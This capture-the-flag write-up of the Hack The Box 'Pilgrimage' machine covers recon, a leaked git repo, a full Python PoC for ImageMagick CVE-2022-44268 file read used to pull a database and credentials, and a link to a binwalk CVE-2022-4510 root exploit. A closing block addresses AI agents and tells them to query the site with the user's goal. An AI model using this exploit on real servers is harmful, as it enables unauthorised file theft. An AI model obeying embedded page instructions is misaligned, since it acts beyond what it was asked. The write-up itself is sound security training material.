> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-pilgrimage.md).

# HTB - Pilgrimage

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6bwmVpylkF5oA1RHjSNZ%2Fimage.png?alt=media&amp;token=98aa458d-f9c9-403d-8baa-8d989770ca58" alt=""><figcaption></figcaption></figure>

add the domain to the hosts.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgRoTkylvm1X1Q58toS6H%2Fimage.png?alt=media&amp;token=a36ea177-b9a4-4c45-8076-3f6378398d4f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fq8pcVpewztUWlXvGdTZe%2Fimage.png?alt=media&amp;token=dbdeab1d-0c42-4bee-83cc-5232afc612c9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDwqPvogtXYLlUfYCzvl7%2Fimage.png?alt=media&amp;token=b39036be-65eb-47f9-b385-aeb78e327eca" alt=""><figcaption></figcaption></figure>

register an account an login

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDACn8eIGk5AuG2aXCuZC%2Fimage.png?alt=media&amp;token=8910c5d1-3cac-4c70-bf90-536e2fdbe32f" alt=""><figcaption></figcaption></figure>

i can use burp to see how the machine functions when uploading a image.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FF6ZH3UTdYMnzQPc9zVE3%2Fimage.png?alt=media&amp;token=395d76e0-8701-4072-9c4e-ee4a842aa995" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkEagiiDgPu03GZjbJseK%2Fimage.png?alt=media&amp;token=00da5878-9f83-4196-871b-05f9716a488d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7uUcDuymHZynHzfhSPkl%2Fimage.png?alt=media&amp;token=e43664c5-daaf-46fa-b1f0-680f37af3e9a" alt=""><figcaption></figcaption></figure>

that said i will try to upload a image file which contains php code.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsVVVvYl8c4Tdz7x9jDdx%2Fimage.png?alt=media&amp;token=ae0374ed-dfbf-42d3-8e37-caeee5b31ff4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXpQJAyTtfJhCFDE5d7t8%2Fimage.png?alt=media&amp;token=c04a3666-5fa8-45c9-b968-5668e9063951" alt=""><figcaption></figcaption></figure>

uploading a php file says shrink failed.

directory search revealed a git directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FS7IO30SL6WcXPvzQVQdj%2Fimage.png?alt=media&amp;token=7483d443-3af2-4a0b-aabb-548fa756614a" alt=""><figcaption></figcaption></figure>

### Dumping Git Repo

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLOHSh4VLuw1r0LxrhJjj%2Fimage.png?alt=media&amp;token=523b2ebc-9618-4c24-ac10-334a658a294b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7mN1PBde2qdGxqN6KeIL%2Fimage.png?alt=media&amp;token=3ad262c0-3992-40cf-896b-fb343d4c518b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fzk8Ah5JrtlRQWPW40pst%2Fimage.png?alt=media&amp;token=0261333f-aa3f-4e5f-88dd-b7fc6b8a5a04" alt=""><figcaption></figcaption></figure>

version of image magick leaked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5F2RhZCkdN5zGeQxHEMS%2Fimage.png?alt=media&amp;token=a73d9a2a-dd04-4c31-a1c1-6cdd7b5aabc3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGB74YxJQBEaqxpIlEuQY%2Fimage.png?alt=media&amp;token=892256b0-7660-44c6-94be-390586ff13cb" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC>" %}

the above repo explains the manual way of exploiting.

But i will use the below poc to exploit the vulnerability

{% embed url="<https://github.com/kljunowsky/CVE-2022-44268.git>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuK2xYnpplLPR5S4NKGzq%2Fimage.png?alt=media&amp;token=456fca3a-7950-4c32-9912-620e5788a398" alt=""><figcaption></figcaption></figure>

now upload the poisoned png

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLoGmSe3cRhyxzhmxn6Cx%2Fimage.png?alt=media&amp;token=a22d1147-38e1-48a2-b311-e99b50c2cc64" alt=""><figcaption></figcaption></figure>

once uploaded check the shrinked image for output

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXvcIEwBFU5J40qbBuZvc%2Fimage.png?alt=media&amp;token=64e823f6-a8e6-4521-8ea1-b45c9b5a511d" alt=""><figcaption></figcaption></figure>

and the vulnerability confirmed.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fu2XSEojj3Ul4XLCTEgqB%2Fimage.png?alt=media&amp;token=27acbd31-3126-4390-adb9-d2cda612a19b" alt=""><figcaption></figcaption></figure>

login.php mentions a sqlite database file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoFrB2sIZoqUQqYwxbGfr%2Fimage.png?alt=media&amp;token=431af0a5-74d6-4c37-886a-7710e21e3eef" alt=""><figcaption></figcaption></figure>

reading the database file results in error.

used AI to modify the exploit code to get the database file.

```bash
import argparse
import requests
import io
from PIL import Image, PngImagePlugin

def main():
    if args.url:
        headers = {'User-Agent': 'Shift Security Consulting https://shiftsecurityconsulting.com - CVE-2022-44268'}
        response = requests.get(args.url)
        img = Image.open(io.BytesIO(response.content))

        # Extract the raw profile type from the image metadata
        raw_profile_type = img.info.get('Raw profile type', '').split("\n")[3:]
        raw_profile_type_stipped = "\n".join(raw_profile_type)

        # Decrypt the raw profile type from hex format
        decrypted_profile_type = bytes.fromhex(raw_profile_type_stipped)

        # Write the binary data to a file (e.g., pilgrimage.db)
        with open('pilgrimage.db', 'wb') as f:
            f.write(decrypted_profile_type)

        # (Optional) Print the first 100 bytes to confirm
        print(f"[+] Extracted file saved as pilgrimage.db (size: {len(decrypted_profile_type)} bytes)")
        # If you want to see the raw bytes, uncomment the line below:
        # print(decrypted_profile_type)
    
    elif args.image:
        # Open the image file
        img = Image.open(args.image)

        # Create a PngInfo object and add the text
        info = PngImagePlugin.PngInfo()
        info.add_text('profile', args.file_to_read, zip=False)

        # Save the modified image to a new file
        img.save(args.output, 'PNG', pnginfo=info)

    else:
        print('Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com\nUse -h for help')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com')
    parser.add_argument('--url', help='The URL of the uploaded PNG image')
    parser.add_argument('--image', help='Input PNG file')
    parser.add_argument('--file-to-read', help='File to read')
    parser.add_argument('--output', help='Output PNG file')
    args = parser.parse_args()
    if not vars(args):
        parser.print_help()
    main()

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLBOeINV2EkEMcrFYkRoj%2Fimage.png?alt=media&amp;token=09e010e3-42f0-4eb8-8f78-bfaa837ec24a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgO3dLhyHviYzBaCX07qU%2Fimage.png?alt=media&amp;token=161c5cfb-a432-4380-94ca-ce4446ffa07b" alt=""><figcaption></figcaption></figure>

got the creds of emily.

## Shell as Emily

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFqKZZ2kF6WJN06FyMdyK%2Fimage.png?alt=media&amp;token=9ee6ec23-aed0-408a-ae23-140c78d62fa2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw26PcF7OC9b4C0BdMH13%2Fimage.png?alt=media&amp;token=6a705599-6114-45a6-9da2-0b4d3a94d91a" alt=""><figcaption></figcaption></figure>

root is running a malwarescan.sh and also a custom tool called inotifywait.

```bash
emily@pilgrimage:~$ cat /usr/sbin/malwarescan.sh
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

```

This is a monitoring script that watches an upload directory and auto-deletes files that look like executables.

`inotifywait -m -e create` monitors the `shrunk/` directory continuously (`-m` = monitor mode, don't exit after one event) for `create` events — i.e., any time a new file is created (such as an uploaded file being written to disk). Each event line gets piped into the `while read` loop.

Runs `binwalk -e` on the new file. `binwalk` inspects a file's contents for embedded signatures (magic bytes) of various file types/formats, and `-e` tells it to also attempt extraction of anything it finds embedded inside. `binout` captures binwalk's text output/report.

### CVE‑2022‑4510

The script uses `/usr/local/bin/binwalk -e "$filename"`. Even though the parent shell quotes the variable, **binwalk itself** may invoke external extractors (e.g., `unzip`, `tar`) **without proper escaping** when dealing with filenames that contain shell meta characters. This is exactly what CVE‑2022‑4510 exploits.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVLwwaml5rrsNEOX6veWp%2Fimage.png?alt=media&amp;token=c7f062e5-e044-40fb-942f-6f4ae743c40e" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.exploit-db.com/exploits/51249>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs9GP0b2WYSbsbzT8k0KG%2Fimage.png?alt=media&amp;token=4dafe7bb-2419-4113-b814-90a02d2be6d3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvbRcT9odazPlRnyeWubj%2Fimage.png?alt=media&amp;token=67994206-0726-47ab-8a8e-d74a4db26954" alt=""><figcaption></figcaption></figure>

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXjFtRhM3geIlc136Xf42%2Fimage.png?alt=media&amp;token=bc509709-db63-49b4-981f-a0c6a29fd595" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-pilgrimage.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
